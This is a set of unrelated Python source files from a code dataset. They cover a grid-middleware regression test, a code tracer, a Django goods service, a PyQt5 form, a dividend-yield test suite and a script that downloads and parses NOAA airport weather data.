'split_path': 'split.txt',\n 'subgraph_path': 'slash.random.',\n 'graph_path': 'graph.txt'\n}","sub_path":"GraphCut/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"420451683","text":"#\n# Bug: 87994\n# Title: yaim-wms doesn't fill the attributes get_acbr and get_owner in the conf file for Glue2\n# Link: https://savannah.cern.ch/bugs/?87994\n#\n#\n\nimport logging\n\nfrom libutils.Exceptions import *\n\ndef run(utils):\n\n bug='87994'\n\n\n if utils.YAIM_FILE=='':\n raise GeneralError(\"Missing required variable (YAIM_FILE)\",\"To verify this bug it is necessary to set the YAIM_FILE in the configuration file\")\n \n logging.info(\"Start regression test for bug %s\"%(bug))\n\n logging.warning(\"To verify this bug you need access to WMS. You have set WMS_USERNAME and WMS_PASSOWRD attributes at configuration file\")\n\n ssh=utils.open_ssh(utils.get_WMS(),utils.get_Username(),utils.get_Password())\n\n target=\"/etc/glite/info/service/glite-info-glue2-wmproxy.conf\"\n\n utils.ssh_get_file(ssh, \"%s\"%(target), \"%s/local_copy\"%(utils.get_tmp_dir()))\n\n utils.ssh_get_file(ssh, \"%s\"%(utils.YAIM_FILE), \"%s/yaim_local_copy\"%(utils.get_tmp_dir()))\n\n ssh.close()\n \n logging.info(\"Parse yaim file to find all the supported VOs\")\n\n FILE=open(\"%s/yaim_local_copy\"%(utils.get_tmp_dir()),\"r\")\n yaim=FILE.readlines()\n FILE.close()\n\n for line in yaim:\n if line.find(\"VOS\")!=-1:\n vos=line.split(\"=\")[1].strip(\" \\\"\\n\").split(\" \")\n logging.info(\"Find the following VOs: %s\"%(vos))\n break\n\n VOS=[]\n\n for vo in vos:\n VOS.append(\"VO:%s\"%(vo))\n\n logging.info(\"Parse file /etc/glite/info/service/glite-info-glue2-wmproxy.conf to find attributes get_acbr and get_owner\")\n \n FILE=open(\"%s/local_copy\"%(utils.get_tmp_dir()),\"r\")\n lines=FILE.readlines()\n FILE.close()\n\n get_acbr=''\n get_owner=''\n\n for line in lines:\n if line.find(\"get_acbr\")!=-1:\n get_acbr=line\n logging.info(\"Attribute get_acbr: %s\"%(get_acbr))\n \n if line.find(\"get_owner\")!=-1:\n get_owner=line\n logging.info(\"Attribute get_owner: %s\"%(get_owner))\n\n\n logging.info(\"Check attribute get_acbr\")\n\n if get_owner.find(\"\\\\n\".join(vos))==-1:\n logging.error(\"Unable to find all supported VOs in attribute get_acbr.\")\n raise GeneralError(\"Check attribute get_acbr\",\"Unable to find all the supported VOs in attribute get_acbr.\")\n else:\n logging.info(\"Find all supported VOs in attribute get_acbr\")\n\n logging.info(\"Check attribute get_owner\")\n \n if get_acbr.find(\"\\\\n\".join(VOS))==-1:\n logging.error(\"Unable to find all the supported VOs in attribute get_owner.\")\n raise GeneralError(\"Check attribute get_owner\",\"Unable to find all the supported VOs in attribute get_owner.\")\n else:\n logging.info(\"Find all supported VOs in attribute get_owner\")\n \n logging.info(\"Test OK\")\n \n logging.info(\"End of regression test for bug %s\",bug)\n","sub_path":"regression_tests/bugs/87994.py","file_name":"87994.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"92699934","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport sys\n\ntraces = [];\n\nclass Tracer(object):\n depth = 0\n filename = ''\n\n def __enter__(self):\n sys.settrace(self.trace)\n\n def __exit__(self, exception_type, value, tb):\n sys.settrace(None)\n\n def trace(self, frame, event, args):\n filename = frame.f_code.co_filename\n if not filename or not 'auger' in filename:\n return\n lineno = frame.f_lineno\n name = frame.f_code.co_name\n if event == 'call':\n self.log(filename, lineno, '%s(%s)' % (name, str(frame.f_locals)))\n self.depth += 1\n elif event == 'return':\n self.log(filename, lineno, ' => %s' % repr(args))\n self.depth -= 1\n elif event == 'line':\n self.log(filename, lineno, '')\n return self.trace\n\n def log(self, filename, lineno, message):\n output = \"\"\n if filename != self.filename:\n output += '\\n%s\\n' % filename\n self.filename = filename\n with open(filename) as fp:\n line = fp.readlines()[lineno - 1][:-1].strip()\n output += '%06s' % lineno + ' ' + ' ' * self.depth + ' ' + line\n if message:\n output += ' # ' + message\n print(output)\n traces.append(output)\n","sub_path":"auger/tracer.py","file_name":"tracer.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"120189813","text":"# coding: utf-8\n\nfrom collections import namedtuple\n\nfrom home_crm.core.services import BaseDjangoORMService\nfrom .models import Good, Commodity\n\n\nGoodStub = namedtuple(\n 'GoodStub', ['id_price', 'id_commodity', 'full_name', 'count', 'barcode'])\n\nCommodityStub = namedtuple('CommodityStub', ['id', 'name', 'category'])\n\n\nclass GoodServiceException(BaseDjangoORMService.ServiceException):\n pass\n\n\nclass GoodArgumentExc(GoodServiceException):\n pass\n\n\nclass GoodNotPriceException(GoodServiceException):\n pass\n\n\nclass GoodNotFountException(GoodServiceException):\n pass\n\n\nclass CommodityService(BaseDjangoORMService):\n\n @classmethod\n def get_by_id(cls, id: int) -> Commodity:\n return Commodity.objects.get(pk=id)\n\n @classmethod\n def get_all_commodity_with_price(cls):\n commodity_all = Commodity.objects.all()\n return commodity_all\n\n @classmethod\n def get_or_create_commodity(cls, name, thematic=None, numeric=None):\n try:\n commodity = Commodity.objects.get(name=name)\n except Commodity.DoesNotExist:\n return False, Commodity(\n name=name, thematic=thematic, numeric=numeric)\n else:\n return True, commodity\n\n @classmethod\n def get_commodity(cls, name):\n return Commodity.objects.filter(name=name).first()\n\n\nclass GoodService(BaseDjangoORMService):\n @classmethod\n def get_goods(cls):\n return Good.objects.all()\n\n @classmethod\n def get_or_create_commodity_numbers(\n cls, commodity_id, number_local=None, number_global=None, id=None):\n commodity = CommodityService.get_by_id(commodity_id)\n\n if commodity.numeric:\n if not number_local and not number_global:\n raise GoodArgumentExc(\n \"Для номерного товара '%s' не указаны номера\" %\n str(commodity.name))\n\n if commodity.numeric is False:\n if number_local or number_global:\n raise GoodArgumentExc(\n \"Для безномерного товара '%s' нельзя указывать номера\" %\n str(commodity.name))\n\n try:\n if id:\n good = Good.objects.get(\n commodity_id=commodity_id,\n number_local=number_local,\n number_global=number_global\n ).exclude(pk=id)\n else:\n good = Good.objects.get(\n commodity_id=commodity_id,\n number_local=number_local,\n number_global=number_global)\n except Good.DoesNotExist:\n if id:\n return False, Good.objects.get(pk=id)\n else:\n return False, Good(commodity_id=commodity_id,\n number_local=number_local,\n number_global=number_global)\n else:\n return True, good\n\n @classmethod\n def get_good_exlude_invoice(cls, invoice_id):\n return Good.objects.exclude(\n invoiceitem__invoice_id=invoice_id\n ).all()\n\n @classmethod\n def get_good(cls, id):\n good = Good.objects.get(pk=id)\n if not good:\n raise GoodNotFountException(u\"Не найдено записи в БД\")\n\n return good\n\n @classmethod\n def get_price(cls, good_id):\n from price.services import PriceService\n good = cls.get_good(good_id)\n if good.price_id:\n return PriceService.get_price(good.price_id)\n\n @classmethod\n def full_name(cls, good):\n return cls.generate_name(good.commodity.name, good.number_local,\n good.number_global)\n\n @classmethod\n def generate_name(cls, name, number_local=None, number_global=None):\n numeric = True if number_local and number_global else False\n if numeric:\n full_name = name + u\" №\" + str(number_local) + u\"(\" + str(\n number_global) + u\")\"\n else:\n full_name = name\n return full_name\n\n @classmethod\n def update_good(cls, session, id, barcode, commodity_id, number_local=None,\n number_global=None, price_id=None,\n full_name=None):\n good = cls.get_good(id)\n good.barcode = barcode\n good.commodity_id = commodity_id\n good.number_local = number_local\n good.number_global = number_global\n good.price_id = price_id\n\n if not full_name:\n full_name = GoodService.full_name(good)\n good.full_name = full_name\n\n session.add(good)\n","sub_path":"home_crm/goods/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"159267241","text":"from PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(820, 309)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.formLayout = QtWidgets.QFormLayout()\n self.formLayout.setObjectName(\"formLayout\")\n self.labelUser = QtWidgets.QLabel(self.centralwidget)\n font = QtGui.QFont()\n font.setPointSize(12)\n self.labelUser.setFont(font)\n self.labelUser.setObjectName(\"labelUser\")\n self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.labelUser)\n self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit.setMinimumSize(QtCore.QSize(0, 30))\n self.lineEdit.setObjectName(\"lineEdit\")\n self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.lineEdit)\n self.label = QtWidgets.QLabel(self.centralwidget)\n font = QtGui.QFont()\n font.setPointSize(12)\n self.label.setFont(font)\n self.label.setObjectName(\"label\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label)\n self.comboBox = QtWidgets.QComboBox(self.centralwidget)\n self.comboBox.setMinimumSize(QtCore.QSize(0, 30))\n self.comboBox.setObjectName(\"comboBox\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.comboBox)\n self.verticalLayout.addLayout(self.formLayout)\n self.pushButton = QtWidgets.QPushButton(self.centralwidget)\n self.pushButton.setObjectName(\"pushButton\")\n self.verticalLayout.addWidget(self.pushButton)\n self.labelResult = QtWidgets.QLabel(self.centralwidget)\n font = QtGui.QFont()\n font.setPointSize(12)\n self.labelResult.setFont(font)\n self.labelResult.setText(\"\")\n self.labelResult.setObjectName(\"labelResult\")\n self.verticalLayout.addWidget(self.labelResult)\n self.labelRes2 = QtWidgets.QLabel(self.centralwidget)\n self.labelRes2.setText(\"\")\n self.labelRes2.setObjectName(\"labelRes2\")\n self.verticalLayout.addWidget(self.labelRes2)\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 820, 26))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.labelUser.setText(_translate(\"MainWindow\", \"Username\"))\n self.label.setText(_translate(\"MainWindow\", \"Действие\"))\n self.pushButton.setText(_translate(\"MainWindow\", \"OK\"))","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"546667596","text":"import pandas as pd\nimport pytest\nfrom hyperopt.pyll import Apply\n\nfrom poptimizer.config import AFTER_TAX\nfrom poptimizer.ml.feature import divyield\n\n\n@pytest.fixture(scope=\"module\", name=\"feat\")\ndef test_divyield_feature():\n return divyield.DivYield(\n (\"PHOR\", \"TATN\", \"DSKY\"), pd.Timestamp(\"2018-12-12\"), {\"days\": 47, \"periods\": 1}\n )\n\n\ndef test_col_names(feat):\n assert feat.col_names == [\"DivYield_0\"]\n\n\ndef test_is_categorical(feat):\n assert feat.is_categorical({\"days\": 47, \"periods\": 2}) == [False, False]\n\n\ndef test_get_params_space(feat):\n space = feat.get_params_space()\n assert isinstance(space, dict)\n assert len(space) == 3\n assert space[\"on_off\"] is True\n assert isinstance(space[\"days\"], Apply)\n assert isinstance(space[\"periods\"], Apply)\n\n\ndef test_get(feat):\n df = feat.get({\"days\": 13, \"periods\": 1})\n assert isinstance(df, pd.DataFrame)\n\n assert pd.Timestamp(\"2018-12-12\") in df.index\n assert pd.Timestamp(\"2018-12-13\") not in df.index\n assert pd.Timestamp(\"2010-01-26\") not in df.index\n\n df = feat.get(dict(days=9, periods=1))\n assert df.loc[(pd.Timestamp(\"2018-06-22\"), \"PHOR\"), \"DivYield_0\"] == pytest.approx(\n AFTER_TAX * 15 / 2291\n )\n assert df.loc[(pd.Timestamp(\"2018-06-25\"), \"PHOR\"), \"DivYield_0\"] == pytest.approx(\n 0\n )\n\n df = feat.get(dict(days=20, periods=1))\n assert df.loc[(pd.Timestamp(\"2018-06-11\"), \"PHOR\"), \"DivYield_0\"] == pytest.approx(\n AFTER_TAX * 15 / 2315\n )\n\n df = feat.get(dict(days=30, periods=1))\n assert df.loc[(pd.Timestamp(\"2018-10-11\"), \"TATN\"), \"DivYield_0\"] == pytest.approx(\n 30.27 * AFTER_TAX / 778.3\n )\n assert df.loc[(pd.Timestamp(\"2018-10-10\"), \"TATN\"), \"DivYield_0\"] == pytest.approx(\n 0\n )\n\n\ndef test_get_many_periods(feat):\n df = feat.get({\"days\": 9, \"periods\": 2})\n assert isinstance(df, pd.DataFrame)\n\n assert pd.Timestamp(\"2018-12-12\") in df.index\n assert pd.Timestamp(\"2018-12-13\") not in df.index\n\n assert df.columns.to_list() == [\"DivYield_0\", \"DivYield_1\"]\n\n assert df.loc[(pd.Timestamp(\"2018-06-08\"), \"PHOR\"), \"DivYield_0\"] == pytest.approx(\n 0\n )\n assert df.loc[(pd.Timestamp(\"2018-06-11\"), \"PHOR\"), \"DivYield_0\"] == pytest.approx(\n AFTER_TAX * 15 / 2315\n )\n assert df.loc[(pd.Timestamp(\"2018-06-15\"), \"PHOR\"), \"DivYield_0\"] == pytest.approx(\n AFTER_TAX * 15 / 2296\n )\n assert df.loc[(pd.Timestamp(\"2018-06-18\"), \"PHOR\"), \"DivYield_0\"] == pytest.approx(\n 0\n )\n\n assert df.loc[(pd.Timestamp(\"2018-06-15\"), \"PHOR\"), \"DivYield_1\"] == pytest.approx(\n 0\n )\n assert df.loc[(pd.Timestamp(\"2018-06-18\"), \"PHOR\"), \"DivYield_1\"] == pytest.approx(\n AFTER_TAX * 15 / 2295\n )\n assert df.loc[(pd.Timestamp(\"2018-06-21\"), \"PHOR\"), \"DivYield_1\"] == pytest.approx(\n AFTER_TAX * 15 / 2286\n )\n assert df.loc[(pd.Timestamp(\"2018-06-22\"), \"PHOR\"), \"DivYield_1\"] == pytest.approx(\n 0\n )\n","sub_path":"poptimizer/ml/feature/tests/test_divyield.py","file_name":"test_divyield.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"462854134","text":"# coding=utf-8\n# Iker Fuentes, David Castilla , Iker Cayero\n\n\"\"\"En primer lloc fem una variable la qual crei un numero aleatori del 0 al 10 i nosaltres l'hem d'endevinar.\nFem un while, un if per saber si el numero que demaem es igual que el que escull aleatoriament i printem el resultat\"\"\"\nimport random\nnum = random.randrange(0,11)\nacierto = False\nwhile acierto == False:\n x = int(input(\"Intenta endevinar el numero: \"))\n if x == num:\n print(\"HAS ENCERTAT!\")\n acierto = True\n else:\n print(\"ERROR\")\n\n","sub_path":"Práctica9/Pràctica 9_Exercici1.py","file_name":"Pràctica 9_Exercici1.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"33307835","text":"# Download data sets from NOAA.\n#See weather_dataframe.py for converting this data into a combined dataframe.\nimport requests\nimport json\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport wget\nfrom mpl_toolkits.basemap import Basemap\nimport pickle\n\n# #Get API keys from JSON file\n# with open('keys.json') as key_file:\n# keys=json.load(key_file)\n#NCDC's call to website.\n\nbiggest_cities=[\n ['AL','Birmingham','Mobile','Huntsville'],\n ['AK','Anchorage','Fairbanks','Juneau'],\n ['AZ','Phoenix','Tucson','Mesa'],\n ['AR','Little Rock','Fort Smith','Fayetteville'],\n ['CA','Los Angeles','San Diego','San Jose'],\n ['CO','Denver','Colorado Springs','Aurora'],\n ['CT','Bridgeport','New Haven','Hartford'],\n ['DE','Wilmington','Dover','Newark'],\n ['FL','Jacksonville','Miami','Tampa'],\n ['GA','Atlanta','Augusta','Columbus'],\n ['HI','Honolulu','Hilo','Kailua'],\n ['ID','Boise','Nampa','Idaho Falls'],\n ['IL','Chicago','Aurora','Rockford'],\n ['IN','Indianapolis','Fort Wayne','Evansville'],\n ['IA','Des Moines','Cedar Rapids','Davenport'],\n ['KS','Wichita','Overland Park','Kansas City'],\n ['KY','Louisville','Lexington','Owensboro'],\n ['LA','New Orleans','Shreveport','Baton Rouge'],\n ['ME','Portland','Lewiston','Bangor'],\n ['MD','Baltimore','Frederick','Gaithersburg'],\n ['MA','Boston','Worcester','Springfield'],\n ['MI','Detroit','Grand Rapids','Warren'],\n ['MN','Minneapolis','St. Paul','Rochester'],\n ['MS','Jackson','Gulfport','Biloxi'],\n ['MO','Kansas City','St. Louis','Springfield'],\n ['MT','Billings','Missoula','Great Falls'],\n ['NE','Omaha','Lincoln','Bellevue'],\n ['NV','Las Vegas','Reno','Henderson'],\n ['NH','Manchester','Nashua','Concord'],\n ['NJ','Newark','Jersey City','Paterson'],\n ['NM','Albuquerque','Las Cruces','Rio Rancho'],\n ['NY','New York','Buffalo','Rochester'],\n ['NC','Charlotte','Raleigh','Greensboro'],\n ['ND','Fargo','Bismarck','Grand Forks'],\n ['OH','Columbus','Cleveland','Cincinnati'],\n ['OK','Oklahoma City','Tulsa','Norman'],\n ['OR','Portland','Salem','Eugene'],\n ['PA','Philadelphia','Pittsburgh','Allentown'],\n ['RI','Providence','Warwick','Cranston'],\n ['SC','Charleston','Columbia','North Charleston'],\n ['SD','Sioux Falls','Rapid City','Aberdeen'],\n ['TN','Memphis','Nashville','Knoxville'],\n ['TX','Houston','San Antonio','Dallas'],\n ['UT','Salt Lake City','West Valley City','Provo'],\n ['VT','Burlington','South Burlington','Rutland'],\n ['VA','Virginia Beach','Norfolk','Chesapeake'],\n ['WA','Seattle','Spokane','Tacoma'],\n ['WV','Charleston','Huntington','Parkersburg'],\n ['WI','Milwaukee','Madison','Green Bay'],\n ['WY','Cheyenne','Casper','Laramie']];\n\n\n#try to map states to power producing regions.\n#This is not quite correct, since some states are split between\n#multiple regions (TN, MS, ND). But will try as first attempt.\nregion_dict={\n 'AL':'Southeast',\n 'AK':'AK',\n 'AZ':'Southwest',\n 'AR':'Midwest',\n 'CA':'California',\n 'CO':'Northwest',\n 'CT':'Northeast',\n 'DE':'Northeast',\n 'FL':'Florida',\n 'GA':'Southeast',\n 'HI':'HI',\n 'ID':'Northwest',\n 'IL':'Midwest',\n 'IN':'Midwest',\n 'IA':'Midwest',\n 'KS':'Central',\n 'KY':'Mid-Atlantic',\n 'LA':'Midwest',\n 'ME':'Northeast',\n 'MD':'Mid-Atlantic',\n 'MA':'Northeast',\n 'MI':'Midwest',\n 'MN':'Midwest',\n 'MS':'Midwest',\n 'MO':'Midwest',\n 'MT':'Northwest',\n 'NE':'Central',\n 'NV':'Southwest',\n 'NH':'Northeast',\n 'NJ':'Mid-Atlantic',\n 'NM':'Southwest',\n 'NY':'New York',\n 'NC':'Carolinas',\n 'ND':'Central',\n 'OH':'Mid-Atlantic',\n 'OK':'Central',\n 'OR':'Northwest',\n 'PA':'Mid-Atlantic',\n 'RI':'Northeast',\n 'SC':'Carolinas',\n 'SD':'Central',\n 'TN':'Tennessee',\n 'TX':'Texas',\n 'UT':'Northwest',\n 'VT':'New England',\n 'VA':'Mid-Atlantic',\n 'WA':'Northwest',\n 'WV':'Mid-Atlantic',\n 'WI':'Midwest',\n 'WY':'Northwest'}\n\n\n# #now make a dict of city names, and station locations.\n# #Find allowed ID number corresponding to largest cities.\n# #Note not all of these have entries. \ndef get_airport_code(dataframe,city_list,depth=3):\n \"\"\"get_airport_code(dataframe,city_list,depth=3)\n Extract the ICAO code/callsign for one airport in each city.\n Return a dataframe with the city,state and callsign.\n \n dataframe: initial dataframe with list of global airports, locations, ICAO callsigns.\n city_list: list of lists cities to find the callsigns for. Containts cities in states.\n depth: how many cities in each state to look for. \n\n\"\"\"\n aircode_df=pd.DataFrame()\n nrows=len(city_list)\n for i in range(0,nrows):\n for j in range(1,depth+1):\n city=city_list[i][j]\n state=city_list[i][0]\n msk=dataframe['City'].str.contains(city)\n #Need separate handling for Portland and Charleston.\n #(Ugly as sin, but should not break.)\n if (city =='Portland'):\n if (state=='OR'):\n call='KPDX'\n elif (state=='ME'):\n call='KPWM'\n msk=dataframe['ICAO'].str.contains(call)\n elif (city =='Charleston'):\n if (state=='SC'):\n call='KCHS'\n elif (state=='WV'): \n call='KCRW'\n msk=dataframe['ICAO'].str.contains(call)\n #If more than one entry, just pick the first one.\n #check there is an entry\n if (sum(msk)==0):\n print('could not find city:'+city)\n df_small=pd.DataFrame()\n #otherwise pick the first.\n else:\n df_small=dataframe[msk].head(n=1)\n df_small['State']=state\n aircode_df=aircode_df.append(df_small)\n\n aircode_df=aircode_df.rename(columns={'ICAO':'CALL'})\n return aircode_df\n\ndef make_airport_df():\n \"\"\"make_airport_df\n Read in a list of global airports, and extract their ICAO codes.\n Restrict then to US cities.\n \"\"\"\n #read in list of airports\n airport_df = pd.read_csv('data/airports.dat',skiprows=1,na_values='\\\\N')\n #only keep US airports, and name,city, and ICAO codes\n msk2=airport_df['Country']=='United States'\n airport_df=airport_df[msk2][['Name','City','ICAO']]\n \n airport_codes=get_airport_code(airport_df,biggest_cities)\n\n return airport_codes\n\ndef read_isd_df():\n \"\"\"make_airport_df\n Read in list of weather stations and USAF-WBAN codes for the weather stations. \n Trim to only stations that have operated since 2015.\n \"\"\"\n\n #now compare with stations from ISD database.\n isd_name_df=pd.read_fwf('data/ISD/isd-history.txt',skiprows=20)\n #also only keep airports still operational in time period.\n msk = isd_name_df['END']>20150000\n isd_name_df=isd_name_df[msk]\n isd_name_df=isd_name_df[['USAF','WBAN','CALL','LAT',\"LON\"]]\n return isd_name_df\n\ndef merge_air_isd(airport_codes,isd_name_df):\n \"\"\"merge_air_isd_df\n \n Merge the airport and weather data frames on name.\n Trim out duplicates.\n\n \"\"\"\n airport_total = pd.merge(airport_codes,isd_name_df,on='CALL')\n \n #drop any duplicated entries. (i.e. multiple at same airport)\n msk3 = airport_total['CALL'].duplicated().values\n print('Duplicated values for:')\n print(airport_total[msk3][['CALL','City']])\n airport_total=airport_total[~msk3]\n # msk1 = airport_codes2['USAF']!=999999\n # msk2 = airport_codes2['WBAN']!=99999\n # airport_codes2=airport_codes2[msk1&msk2]\n \n #make these codes integers.\n airport_total['USAF']=airport_total['USAF'].astype(int)\n airport_total['WBAN']=airport_total['WBAN'].astype(int)\n \n return airport_total\n\ndef plot_airports(air_df):\n \"\"\"plot_airports(air_df)\n Plot the locations of the airports contained within air_df.\n Useful for eyeballing if there are systematic flaws in the locations \n that made the cut.\n \"\"\"\n # try:\n # m=pickle.load(open('usstates.pickle','rb'))\n # print('Loading Map from pickle')\n # except:\n #if not, remake the Basemap (costs lots of time)\n try:\n plt.figure() \n print('Creating Fine BaseMap and storing with pickle')\n m=Basemap(projection='merc',llcrnrlon=-130,llcrnrlat=25,\n urcrnrlon=-65,urcrnrlat=50,resolution='l', \n lon_0=-115, lat_0=35)\n m.drawstates()\n m.drawcountries()\n m.drawcoastlines()\n pickle.dump(m,open('usstates.pickle','wb'),-1)\n except:\n print(meh)\n #actually draw the map\n lons = air_df['LON'].values\n lats = air_df['LAT'].values\n m.scatter(lons,lats,latlon=True)\n plt.show()\n return None\n\n#now download the data from NOAA:\ndef wget_data(USAF,WBAN,yearstr,city,airport):\n \"\"\"wget_data(USAF,WBAN,yearstr,city,airport)\n Download automated weather station data from NOAA for a given year at a given airport.\n \n USAF: USAF 6 digit code for airport.\n WBAN: NOAA code for weather station at airport\n yearstr: a string containing the 4 digit year.\n city: city the airport is located in\n airport: Name of the airport.\n \"\"\"\n base_url='ftp://ftp.ncdc.noaa.gov/pub/data/noaa/isd-lite/'\n file_name=isd_filename(yearstr,USAF,WBAN)\n url=base_url+file_name\n try:\n print('\\n trying: {}'.format(url))\n wget.download(url,out='data/ISD')\n except:\n print('\\n could not download data from city:',city,airport)\n return None\n\ndef isd_filename(yearstr,USAF,WBAN):\n \"\"\" isd_filename(yearstr,USAF,WBAN)\n Make filename corresponding to zipped file names used in ISD database.\n \"\"\"\n #put in some padding {:0>5} for shorter codes.\n fn=\"{0}/{1}-{2:0>5}-{0}.gz\".format(yearstr,str(USAF),str(WBAN))\n return fn\n \n#download weather data for all of the airports specified in aircode\ndef get_all_data(aircode,years=['2015','2016','2017']):\n \"\"\"get_all_data(aircode,years=['2015','2016','2017'])\n Download the data for all airports we could find weather stations for in desired cities.\n\n aircode: datafram containing airport codes, NOAA station numbers, airports\n years: array of strings for the years to seek data.\n \"\"\"\n for yearstr in years:\n for i in range(len(aircode)):\n ap = aircode.iloc[i]\n usaf=ap['USAF']\n wban=ap['WBAN']\n city=ap['City']\n airport=ap['Name']\n wget_data(usaf,wban,yearstr,city,airport)\n return None\n\n#now read it in, convert to time-series.\n\ndef convert_isd_to_df(filename,city,state):\n \"\"\"\n convert_to_df(filename)\n \n Read in a automated weather stations data from file.\n Data is space separated columns, with format given in\n \"isd-lite-format.txt\".\n Converts to pandas dataframe using date/time columns as DateTimeIndex.\n Format info:\n 1: Year\n 2: Month\n 3: Day\n 4: Hour \n 5: Temperature (x10) in celcius\n 6: Dew point temperature (x10) in celcius\n 7: Sea level pressure (x10 in hectopascals)\n 8: Wind direction (degrees from north)\n 9: Wind speed (x10 in meters per second)\n 10: Cloud Coverage (categorical)\n 11: Precipitation for One Hour (x10, in mm)\n 12: Precipitation total for Six hours (x10 in mm)\n\n All missing values are -9999.\n \"\"\"\n #use fixed width format to read in (isd-lite-format has data format)\n col_names=['year','month','day','hour',\n 'Temp','DewTemp','Pressure',\n 'WindDir','WindSpeed','CloudCover',\n 'Precip-1hr','Precip-6hr']\n df=pd.read_fwf(filename,compression='gzip',\n na_values=['-9999','999'],names=col_names)\n city_st=city+', '+state\n df['city']=city\n df['state']=state\n df['city, state']=city_st\n df['region']=region_dict[state] \n #make a time index.\n times=pd.to_datetime({'year':df['year'],\n 'month':df['month'],\n 'day':df['day'],\n 'hour':df['hour']})\n Tindex=pd.DatetimeIndex(times)\n df.index=Tindex\n #df.index=pd.MultiIndex.from_product([Tindex,[city_st]])\n #delete those columns\n df=df.drop(labels=['year','month','day','hour'],axis=1)\n return df\n\n# fn = 'data/ISD/702650-26407-2015.gz'\n# city='Blah'\n# state='OR'\n \n# df=convert_isd_to_df(fn,city,state)\n\ndef convert_state_isd(air_df,ST):\n \"\"\"convert_all_isd(air_df)\n convert the weather files for a particular state into \n one big data frame.\n \"\"\"\n data_dir='data/ISD/'\n Tindex=pd.DatetimeIndex(start='2015-07',end='2017-11',freq='h')\n df_tot=pd.DataFrame(index=Tindex)\n #select out only the entries for the desired state.\n msk = air_df['State']==ST\n air_msk=air_df[msk]\n for i in range(len(air_msk)):\n for yearstr in ['2015','2016','2017']:\n ap = air_msk.iloc[i]\n usaf=ap['USAF']\n wban=ap['WBAN']\n city=ap['City']\n state=ap['State']\n file_name=\"data/ISD/{1}-{2:0>5}-{0}.gz\".format(yearstr,str(usaf),str(wban))\n df=convert_isd_to_df(file_name,city,state)\n df_tot=df_tot.append(df)\n print('done with {}'.format(ap['Name']))\n return df_tot\n\ndef convert_all_isd(air_df):\n \"\"\"convert_all_isd(air_df)\n convert all the weather files for all stations and all years into \n one big data frame.\n \"\"\"\n data_dir='data/ISD/'\n Tindex=pd.DatetimeIndex(start='2015-07',end='2017-11',freq='h')\n df_tot=pd.DataFrame(index=Tindex)\n nmax=len(air_df)\n for i in range(nmax):\n for yearstr in ['2015','2016','2017']:\n ap = air_df.iloc[i]\n usaf=ap['USAF']\n wban=ap['WBAN']\n city=ap['City']\n state=ap['State']\n file_name=\"data/ISD/{1}-{2:0>5}-{0}.gz\".format(yearstr,str(usaf),str(wban))\n df=convert_isd_to_df(file_name,city,state)\n df_tot=df_tot.append(df)\n print('done with {}'.format(ap['Name']))\n return df_tot\n\n# def make_weather_multiindex(air_df):\n# #Tindex=pd.DatetimeIndex(start='2015-07',end='2017-11',freq='h')\n# Tindex=pd.DatetimeIndex(start='2015-07',end='2016-03',freq='m') \n# city_list=list()\n# nmax=4;#len(air_df)\n# for i in range(nmax):\n# ap = air_df.iloc[i]\n# city=ap['City']\n# state=ap['State']\n# city_ST=city+', '+state\n# city_list.append(city_ST)\n# joint_index=pd.MultiIndex.from_product([Tindex,city_list])\n# return joint_index\n\n#make dataframes with codes.\ntry:\n air_df=pd.read_csv('data/air_code_df.gz')\nexcept:\n airport_codes=make_airport_df()\n isd_names=read_isd_df()\n air_df=merge_air_isd(airport_codes,isd_names)\n #write output to csv\n air_df.to_csv('data/air_code_df.gz',compression='gzip',header=True)\n\n#ind=make_weather_multiindex(air_df)\n \n##actually download the data from 2015-2017 from the stations listed in air_code_df. (takes a few minutes)\n#get_all_data(air_df)\n\n# d0=convert_all_isd(air_df)\n# # #converted file to csv to save time.\n# 